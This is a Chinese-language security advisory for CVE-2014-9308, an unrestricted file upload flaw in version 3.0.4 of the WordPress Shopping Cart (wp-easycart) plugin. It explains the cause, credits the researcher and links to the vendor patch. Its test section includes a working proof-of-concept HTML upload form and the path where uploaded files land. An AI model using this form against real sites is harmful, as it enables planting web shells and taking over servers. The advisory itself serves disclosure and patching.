WordPress Shopping Cart插件\'banneruploaderscript.php\'任意文件上传漏洞
BugTraq-ID:71983
CVE-ID:CVE-2014-9308
发布日期：2015-01-09
更新日期：2015-01-13
受影响系统：
WordPress Shopping Cart 3.0.4
详细信息：

WordPress Shopping Cart插件是购物车系统，具有电子交易功能和管理工具。

 

WordPress Shopping Cart 3.0.4及其他版本在实现上存在不受限制文件上传漏洞，由于banneruploaderscript.php内存在不正确的if语句，任何注册的用户都可以上传任意文件。攻击者可利用此漏洞上传任意文件到受影响计算机。

来源：
Kacper Szurek
参考信息：
http://packetstormsecurity.com/files/129875/WordPress-Shopping-Cart-3.0.4-Unrestricted-File-Upload.html
测试方法：
警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！Kacper Szurek （）提供了如下测试方法：

 

Login as regular user (created using wp-login.php?action=register):

 

<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">

<input type="hidden" name="datemd5" value="1">

<input type="file" name="Filedata">

<input value="Upload!" type="submit">

</form>

 

File will be visible:

 

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
解决办法：
厂商补丁：

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

 

 

https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip